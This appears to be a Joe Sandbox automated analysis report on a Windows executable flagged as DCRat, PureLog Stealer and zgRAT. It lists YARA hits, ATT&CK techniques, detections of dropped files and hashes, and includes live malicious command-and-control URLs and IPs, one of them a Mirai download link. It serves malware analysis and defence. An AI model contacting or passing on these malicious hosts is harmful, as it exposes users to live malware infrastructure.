Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1535361216.00000000128EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yQrCGtNgsf.exe PID: 7588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JPOyDhPFIytu.exe PID: 7920, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: yQrCGtNgsf.exe, type: SAMPLE
Source: Yara match	File source: 0.0.yQrCGtNgsf.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1437836517.0000000000272000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: yQrCGtNgsf.exe, type: SAMPLE
Source: Yara match	File source: 0.0.yQrCGtNgsf.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1535361216.00000000128EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yQrCGtNgsf.exe PID: 7588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JPOyDhPFIytu.exe PID: 7920, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: yQrCGtNgsf.exe, type: SAMPLE
Source: Yara match	File source: 0.0.yQrCGtNgsf.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1437836517.0000000000272000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: yQrCGtNgsf.exe, type: SAMPLE
Source: Yara match	File source: 0.0.yQrCGtNgsf.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	11 Process Injection	133 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
yQrCGtNgsf.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
yQrCGtNgsf.exe	62%	Virustotal		Browse
yQrCGtNgsf.exe	100%	Avira	HEUR/AGEN.1323342
yQrCGtNgsf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\6C8kMSA4ag.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\GJcAmyRG.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\9VsmEYMPZS.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\uw07fWAZe6.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\mpHYiEZ4vY.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\9eKXf9oU9J.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\mzBmoeLRKc.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\F0qtrCuOKA.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\NkPigQpK.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\FTTrxXjd.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\KRjbfmWU.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\77a9gOcAJB.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\BDesMBdT.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\GJcAmyRG.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\LCrhcYww.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\KZthgyKJ.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\FTTrxXjd.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	62%	Virustotal		Browse
C:\Program Files\Adobe\Acrobat DC\JPOyDhPFIytu.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Adobe\Acrobat DC\JPOyDhPFIytu.exe	62%	Virustotal		Browse
C:\Program Files\Uninstall Information\JPOyDhPFIytu.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Uninstall Information\JPOyDhPFIytu.exe	62%	Virustotal		Browse
C:\Recovery\JPOyDhPFIytu.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\JPOyDhPFIytu.exe	62%	Virustotal		Browse
C:\Users\user\Desktop\BDesMBdT.log	8%	ReversingLabs
C:\Users\user\Desktop\BDesMBdT.log	11%	Virustotal		Browse
C:\Users\user\Desktop\FTTrxXjd.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\FTTrxXjd.log	69%	Virustotal		Browse
C:\Users\user\Desktop\GJcAmyRG.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\GJcAmyRG.log	69%	Virustotal		Browse
C:\Users\user\Desktop\HPxsKDSZ.log	29%	ReversingLabs
C:\Users\user\Desktop\HPxsKDSZ.log	29%	Virustotal		Browse
C:\Users\user\Desktop\IjLZavdG.log	29%	ReversingLabs
C:\Users\user\Desktop\IjLZavdG.log	29%	Virustotal		Browse
C:\Users\user\Desktop\KRjbfmWU.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\KRjbfmWU.log	41%	Virustotal		Browse
C:\Users\user\Desktop\KZthgyKJ.log	8%	ReversingLabs
C:\Users\user\Desktop\KZthgyKJ.log	11%	Virustotal		Browse
C:\Users\user\Desktop\LCrhcYww.log	8%	ReversingLabs
C:\Users\user\Desktop\LCrhcYww.log	11%	Virustotal		Browse
C:\Users\user\Desktop\MAAYLQkP.log	29%	ReversingLabs
C:\Users\user\Desktop\MAAYLQkP.log	29%	Virustotal		Browse
C:\Users\user\Desktop\NkPigQpK.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\NkPigQpK.log	41%	Virustotal		Browse
C:\Users\user\Desktop\OzAXPueG.log	29%	ReversingLabs
C:\Users\user\Desktop\OzAXPueG.log	29%	Virustotal		Browse
C:\Users\user\Desktop\RdNoqiHi.log	29%	ReversingLabs
C:\Users\user\Desktop\RdNoqiHi.log	29%	Virustotal		Browse
C:\Users\user\Desktop\RfcHRSFf.log	29%	ReversingLabs
C:\Users\user\Desktop\RfcHRSFf.log	29%	Virustotal		Browse
C:\Users\user\Desktop\SKvXgoIi.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\SKvXgoIi.log	41%	Virustotal		Browse
C:\Users\user\Desktop\TADrPPcC.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\TADrPPcC.log	69%	Virustotal		Browse
C:\Users\user\Desktop\TLlpvaAw.log	29%	ReversingLabs
C:\Users\user\Desktop\TLlpvaAw.log	29%	Virustotal		Browse
C:\Users\user\Desktop\TzzXjEkC.log	29%	ReversingLabs
C:\Users\user\Desktop\TzzXjEkC.log	29%	Virustotal		Browse
C:\Users\user\Desktop\UkLxLBCd.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\UkLxLBCd.log	41%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
115583cm.n9shteam2.top	14%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://115583cm.n9shteam2.top	14%	Virustotal		Browse
http://115583cm.n9shteam2.top/	14%	Virustotal		Browse
http://115583cm.n9shteam2.top/vmTo_authDbbaseTesttrackDatalifedownloads.php	10%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
115583cm.n9shteam2.top	37.44.238.250	true	true	14%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://115583cm.n9shteam2.top/vmTo_authDbbaseTesttrackDatalifedownloads.php	true	10%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://115583cm.n9shteam2.top/	JPOyDhPFIytu.exe, 00000033.00000002.2700888300.0000000002F42000.00000004.00000800.00020000.00000000.sdmp	true	14%, Virustotal, Browse	unknown
http://115583cm.n9shteam2.top	JPOyDhPFIytu.exe, 00000007.00000002.1617677751.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000007.00000002.1617677751.0000000002905000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000000D.00000002.1751164556.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000000D.00000002.1751164556.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000012.00000002.1827430038.000000000301E000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000012.00000002.1827430038.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000019.00000002.1953590953.000000000316C000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000019.00000002.1953590953.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000001E.00000002.2039412444.0000000003719000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000001E.00000002.2039412444.0000000003548000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000023.00000002.2117584568.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000023.00000002.2117584568.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000028.00000002.2195444708.0000000003379000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000028.00000002.2195444708.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000002D.00000002.2484265847.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000002D.00000002.2484265847.0000000003487000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000033.00000002.2700888300.0000000003113000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000033.00000002.2700888300.0000000002F42000.00000004.00000800.00020000.00000000.sdmp	true	14%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	yQrCGtNgsf.exe, 00000000.00000002.1532044343.0000000002DF4000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000007.00000002.1617677751.0000000002905000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000000D.00000002.1751164556.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000012.00000002.1827430038.000000000301E000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000019.00000002.1953590953.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000001E.00000002.2039412444.0000000003548000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000023.00000002.2117584568.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000028.00000002.2195444708.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000002D.00000002.2484265847.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000033.00000002.2700888300.0000000002F42000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.44.238.250	115583cm.n9shteam2.top	France		49434	HARMONYHOSTING-ASFR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1521033
Start date and time:	2024-09-28 03:21:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	56
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	yQrCGtNgsf.exe renamed because original name is a hash value
Original Sample Name:	330a09824e901f7c2fb65be086df1493.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@89/88@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target JPOyDhPFIytu.exe, PID 2616 because it is empty
Execution Graph export aborted for target JPOyDhPFIytu.exe, PID 5592 because it is empty
Execution Graph export aborted for target JPOyDhPFIytu.exe, PID 5760 because it is empty
Execution Graph export aborted for target JPOyDhPFIytu.exe, PID 7580 because it is empty
Execution Graph export aborted for target JPOyDhPFIytu.exe, PID 7920 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:22:24	API Interceptor	9x Sleep call for process: JPOyDhPFIytu.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37.44.238.250	qDlkXj5kcZ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	918938cm.n9shteam2.top/JspacketWindows.php
	C0laqZmkEf.exe	Get hash	malicious	DCRat	Browse	288583cm.n9shteam2.top/tohttppacketcpuBigloadProtectdbgeneratorlocal.php
	VL1xZpPp1I.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	seroi.top/imageSecurelowlongpollapisqllocal.php
	qM9xet97tX.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	272450cm.n9shteam2.top/eternalasync.php
	o2ymBtmuuW.exe	Get hash	malicious	DCRat	Browse	seroi.top/imageSecurelowlongpollapisqllocal.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HARMONYHOSTING-ASFR	qDlkXj5kcZ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	C0laqZmkEf.exe	Get hash	malicious	DCRat	Browse	37.44.238.250
	VL1xZpPp1I.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	qM9xet97tX.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	o2ymBtmuuW.exe	Get hash	malicious	DCRat	Browse	37.44.238.250
	http://37.44.238.67/bins.sh	Get hash	malicious	Mirai	Browse	37.44.238.67
	lleJwlAImyqhwZhZbB4dwBpBt4quciaLIx.elf	Get hash	malicious	Unknown	Browse	37.44.238.75
	oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt.elf	Get hash	malicious	Unknown	Browse	37.44.238.75
	6mXYDuVjkYQ1THGXik9a0pAAofy3U2Zedb.elf	Get hash	malicious	Unknown	Browse	37.44.238.75

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\BDesMBdT.log	qDlkXj5kcZ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	C0laqZmkEf.exe	Get hash	malicious	DCRat	Browse
	VL1xZpPp1I.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	qM9xet97tX.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	F0F0LjrOzL.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	4NE6yDivAo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	OR4zbcEK70.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	BootstrapperV1.19.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	eRZQCpMb4y.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\Microsoft.NET\RedistList\599871f56ea49f

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	ASCII text, with very long lines (855), with no line terminators
Category:	dropped
Size (bytes):	855
Entropy (8bit):	5.902131524414591
Encrypted:	false
SSDEEP:	24:yCLfMkX0v+ywppOB7c7sqSRW+LTxJVmhfA:yCTM3v+7cQ7vvIHVV
MD5:	C628287B53FBEAB7B6C921C673FD8FA6
SHA1:	697AD677EB10A56F9A986057530E02F18A2B0F7E
SHA-256:	93143686694E0C0F640C1FDF521E192878ACE201CF074F3ED5AD753571F3CC4C
SHA-512:	CBA31DD2D5E4502A60731E45851124B537A685EDFDB79073684C561CBE550EF43BFAB17142EEC45A5FA3B847D17D3209DF9C4750A761BB6863866C837BC37EDF
Malicious:	false
Preview:	gI5YboPa5zFjMmUWSRAoOae6nCDsZa5WbnT05gohYM6xdUmZD8dIwdmFn8uZkgAe4tHiTebvmdQBdrdSZopb6wj8AOM6vP61Mc3tNDGihsfTMkl5fc961ihHKIhFSe9XgYzBytFVhG4ORPwamQbTP9An4viEgBQDsIxxvkHvWoZvoT05WHdBCpHhYMHCKAzgz1gIc8oBJp7lkO8l5nsYiPADAPZicEkVz35xwrdXcb2Wsg6JOgHhSa7k0dIMjGjEFlvrTKyNKU5HXnUdTPU66DDY5V7TjRyW2xRGuP0Dr4X7f0NNIo3TvmICiXv8Neo3gjOkWOsDZQPCqG3EItL4YelPoPhXe20MQeb6lm135z4eXFWcdqzdTteB795GqVjgaCwLo7df2R9ikG2i3F3xCX3g9Z8mruNkQXEUTKxgNUkBu6b1GWNlbveCJPMP90yIEYRMChPtSXksx1wC7GgUhlJf3CLD7ihWgc7VpPziHeSDLwPRdKR2UdkcPwSAWLvu0NLV4aXsR7NDTFUHw3jxQpCC1eG26zL5siN7k4XDwikWPhJKcLNcm8dLLIdZUewcwSVu2Wg2ggArEqxUU5avltTtEBwba7sSwHk7MYRFoU6F7vGeVJFYDA0C9lp0jFbjxs46FzH6nVGRxNwS5RFR2UOvQh8lsbfi2WSP0JZgBIus4jPvyW5RAKqcdJqi1gNMzhYa4gcv2jPtjg1rRMwVgOirqzvrd0oe5i3WKz0S4JZa4727R8Qou1pl8qtFvuSC4vxBnfgcVdbXzIws6yaekAtE2RXdFvhK1XgJJ1UwbySQaSw03BJ6Txb4BtJVHCWk6QfclnjFdoDwrdnkfgjEmk0

C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1912832
Entropy (8bit):	7.53583426684731
Encrypted:	false
SSDEEP:	24576:lZFeGcDsavzoey8aUB/WN0/AZ7mNUxrE3cmOrwAUqGStlkuVUoPYQhMaXeRTl:laiUB/WN0/AZ7mNUxrEle3/JVU0Yb
MD5:	330A09824E901F7C2FB65BE086DF1493
SHA1:	236A6A080F1EA340343BEDAB226A88B3B92EA9CF
SHA-256:	6C43C7E744EC4C55BEC5FA9156561D81015DB4CB2574C39648A5F5EFC69943FA
SHA-512:	8DA1191FB37876DB6E4747D3807999995DBD965C0D13D21B944B941E8455DAA7512C9322C7E56BB228C83FC8BABE849685685C16DD000CB3E8E5A3822E7A6C77
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog 